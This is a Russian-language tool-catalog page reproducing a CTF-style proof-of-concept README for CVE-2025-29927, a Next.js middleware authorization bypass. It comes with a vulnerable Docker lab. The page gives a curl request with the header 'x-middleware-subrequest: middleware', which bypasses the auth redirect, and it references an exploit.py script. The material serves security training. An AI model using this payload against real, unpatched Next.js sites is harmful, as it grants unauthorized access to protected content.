Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-29927 — CTF-стиль proof-of-concept, демонстрирующий обход авторизации middleware Next.js (CVE-2025-29927). Включает уязвимое Docker-приложение и эксплойт-скрипт для получения флага с защищённого маршрута. | Kitploit
Инструменты/GitHubGitHub/mhamzakhattak/cve-2025-29927
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийCTFТестирование на ПроникновениеОбучение и Образование
GitHubmhamzakhattak/cve-2025-29927

CVE-2025-29927

CTF-стиль proof-of-concept, демонстрирующий обход авторизации middleware Next.js (CVE-2025-29927). Включает уязвимое Docker-приложение и эксплойт-скрипт для получения флага с защищённого маршрута.

Репозиторий
111 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-29927 - Обход авторизации промежуточного ПО Next.js (PoC)

Это Capture The Flag (CTF)-стилизованное доказательство концепции для уязвимости обхода авторизации промежуточного ПО Next.js (CVE-2025-29927). Цель — обойти промежуточное ПО аутентификации и получить флаг из маршрута /protected.


Сводка по уязвимости

  • CVE: CVE-2025-29927
  • Тип: Обход авторизации
  • Компонент: Промежуточное ПО Next.js
  • Воздействие: Неавторизованный доступ к защищённым маршрутам
  • Целевой маршрут PoC: /protected
  • Ожидаемое поведение: Неавторизованные пользователи перенаправляются на /
  • Уязвимое поведение: Использование специально сформированного запроса позволяет обойти перенаправление и получить доступ к защищённому контенту напрямую

Настройка PoC

1. Клонирование репозитория

root@kitploit:~
git clone https://github.com/mhamzakhattak/CVE-2025-29927
cd CVE-2025-29927
cd nextjs-docker

2. Сборка и запуск уязвимого приложения

root@kitploit:~
sudo docker build -t nextjs-auth-app .
sudo docker run -p 3000:3000 nextjs-auth-app

Это запустит уязвимое приложение Next.js на http://IP:3000


Эксплуатация

1. Без эксплойта

Попробуйте получить доступ:

root@kitploit:~
curl -i http://IP:3000/protected

Вы будете перенаправлены на /.

root@kitploit:~
 curl -H "x-middleware-subrequest: middleware" http://IP:3000/protected

2. С эксплойтом

Используйте предоставленный exploit.py для обхода промежуточного ПО и доступа к защищённому маршруту:

root@kitploit:~
python3 exploit.py -url http://IP:3000

В случае успеха вы получите флаг из /protected.


Файлы

  • Dockerfile - Собирает уязвимое приложение Next.js
  • exploit.py - Эксплуатирует уязвимость для обхода аутентификации
  • pages/ - Содержит уязвимые маршруты /protected и /login
  • middleware.js - Уязвимая логика промежуточного ПО
  • README.md - Этот файл

Отказ от ответственности

Это PoC предназначен только для образовательных и исследовательских целей. Не используйте его против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.


🏁 Флаг

Найдите флаг, эксплуатируя уязвимость и перейдя по адресу:

root@kitploit:~
http://IP:3000/protected

Удачи! 🏴‍☠️

Скачать инструмент